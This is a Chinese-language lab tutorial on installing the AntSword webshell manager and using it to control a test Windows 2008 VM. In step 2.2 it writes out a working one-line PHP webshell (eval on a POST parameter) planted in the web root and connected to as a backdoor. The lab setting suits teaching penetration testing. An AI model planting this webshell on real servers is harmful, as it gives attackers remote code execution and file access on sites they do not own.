目录
- 1 中国蚁剑安装及设置
- 1.1 下载
- 1.2 安装
- 1.3 相关设置
- 2 中国蚁剑应用实例
- 2.1 操作环境
- 2.2 具体步骤
- 3 总结
- 参考文章
任何人不得将其用于非法用途以及盈利等目的,也禁止未经允许私自修改打包进行发布,否则后果自行承担并将追究其相关责任!
中国蚁剑是一款开源的 跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。
1 中国蚁剑安装及设置
安装位置:win10真实机
1.1 下载
(1)下载蚁剑加载器。在蚁剑官方github下载,网址为https://github.com/AntSwordProject/AntSword-Loader,根据自己系统下载对应版本。
(1)可以不下载源码,选择工作文件时下载器将自动安装最新源码,如果想利用现有源码,则在选择工作文件时选择已有源码目录。
1.2 安装
(1)本次安装不指定已有源码,让软件直接下载最新版源码,确定蚁剑工作目录所在文件夹,并在其下创建一个命名为“蚁剑工作目录”的文件夹。
(2)解压1.1节下载好的加载器,在该文件夹中找到安装程序,以管理员身份运行加载器。
(3)点击初始化→选择第一步创建的文件夹→确定。
(4)程序将自动下载安装,过程如下:
(5)待安装过程结束后,再次打开第2步的加载器程序,则会打开蚁剑工作界面。
1.3 相关设置
在软件界面左上角,根据自己需要可对语言、代理等进行设置。
2 中国蚁剑应用实例
2.1 操作环境
靶机:win2008虚拟机,部署WAMP环境,IP地址为172.16.1.1。win2008部署WAMP环境可参考《[【语言环境】WAMP环境部署及优化—以win2008R2SP1为操作系统]
操作机:win10系统,部署中国蚁剑。
2.2 具体步骤
(1)启动Phpstudy以及新建一句话木马。在靶机上win2008虚拟机,启动Phpstudy,并在网站根目录下新建一个文件并命名为xiaoma.php,写入语句<?php eval($_POST['QQ']); ?>
(2)蚁剑添加数据。在真实机上,打开蚁剑软件,在工作界面空白处单击「鼠标右键」,弹出菜单,选择 「添加数据」。
(3)填写数据对应参数。在添加数据页面输入以下参数,其中星标的是必填项,URL是靶机刚刚添加文件的路径,密码(即变量)是该文件中语句的密码。填写完毕后点击“添加”。
(4)蚁剑界面上将显示刚刚建立的后门。
(5)双击进入,可以看到管理界面就像本机文件管理器一样;或者选中刚刚建立的后门,右键后可以看到其主要的功能。
3 总结
(1)了解蚁剑的安装过程;
(2)了解蚁剑的功能;
(3)掌握蚁剑的基本使用方法。
参考文章
[1]《蚁剑——语雀笔记》
[2]《【简单工具】中国蚁剑V2.0下载安装到上手》
